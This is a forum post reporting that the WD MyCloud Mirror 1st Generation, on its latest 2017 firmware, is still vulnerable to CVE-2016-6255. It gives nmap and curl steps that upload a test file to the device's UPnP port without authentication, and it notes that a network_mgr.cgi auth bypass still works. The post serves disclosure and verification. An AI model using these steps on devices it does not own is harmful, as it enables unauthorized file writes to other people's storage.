Addition to MyCloud wiki entry (CVE-2016-6255)

Just looking to chat about anything, even if its not worth being chatted about. This is likely the place to go.
Post Reply
tempaccount2
Android 1.0
Posts: 1
Joined: Thu Nov 30, 2017 11:11 pm

Addition to MyCloud wiki entry (CVE-2016-6255)

Post by tempaccount2 » Thu Nov 30, 2017 11:13 pm

Hi,

i wasn't sure if this is the correct place to report this. Please correct me if i'm wrong.

I would like to submit an addition to the Western Digital MyCloud wiki page available at:

https://www.exploitee.rs/index.php/West ... al_MyCloud

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simple checked with the following steps to upload a file to the target device:

1. Scan for the UPnP TCP port of the device:

Code: Select all

nmap -p 49000-49999 IP
2. Verify that the file doesn't exist yet:

Code: Select all

curl -i http://IP:49154/test123
(Use the previously found port)

3. Upload a new file:

Code: Select all

curl -i --data "uploadtest" http://IP:49154/test123
4. Verify that the file exists:

Code: Select all

curl -i http://IP:49154/test123

As a side-note the network_mgr.cgi auth bypass described in:

https://www.exploitee.rs/index.php/West ... .2F2017.29

still works on the latest firmware 2.11.168 (11/28/17) of the WD MyCloud Mirror 1st Generation

*Edit*

Seems that is even known since more then a year ago:

https://community.wd.com/t/security-vul ... oad/176448

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest

 

 

cron

Login  •  Register